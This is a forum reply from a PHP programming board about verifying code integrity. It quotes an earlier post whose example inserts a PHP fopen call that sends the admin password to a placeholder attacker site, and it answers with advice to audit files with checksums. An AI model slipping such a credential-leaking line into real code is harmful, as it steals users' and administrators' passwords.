You are here: Re: Is there a way to verify integrity of php/javascript code « PHP Programming Language « IT news, forums, messages
Re: Is there a way to verify integrity of php/javascript code

Posted by Malcolm Dew-Jones on 10/17/10 11:27

Han (googlepost@safeblue.com) wrote:
: Passwords are not stored in plaintext. However, still it's a 2 secs job
: to change this line
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: to
: fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: The admin password is leaked the next time user logs in.
: [excuse the syntax errors]


It's only a 2 secs job if the computer is not secure. If you can't trust
the people with privileged passwords then you're stuck.

In that case, you may wish to have a second "more trusted" person to audit
the computer at random intervals using a check sum program to identify
changes and inspect them. (This is a good idea anyway to identify hacker
intrusions, and to catalog exactly when other changes occured).



--

This programmer available for rent.

 

Navigation:

[Reply to this message]


Удаленная работа для программистов  •  Как заработать на Google AdSense  •  England, UK  •  статьи на английском  •  PHP MySQL CMS Apache Oscommerce  •  Online Business Knowledge Base  •  DVD MP3 AVI MP4 players codecs conversion help
Home  •  Search  •  Site Map  •  Set as Homepage  •  Add to Favourites

Copyright © 2005-2006 Powered by Custom PHP Programming

Сайт изготовлен в Студии Валентина Петручека
изготовление и поддержка веб-сайтов, разработка программного обеспечения, поисковая оптимизация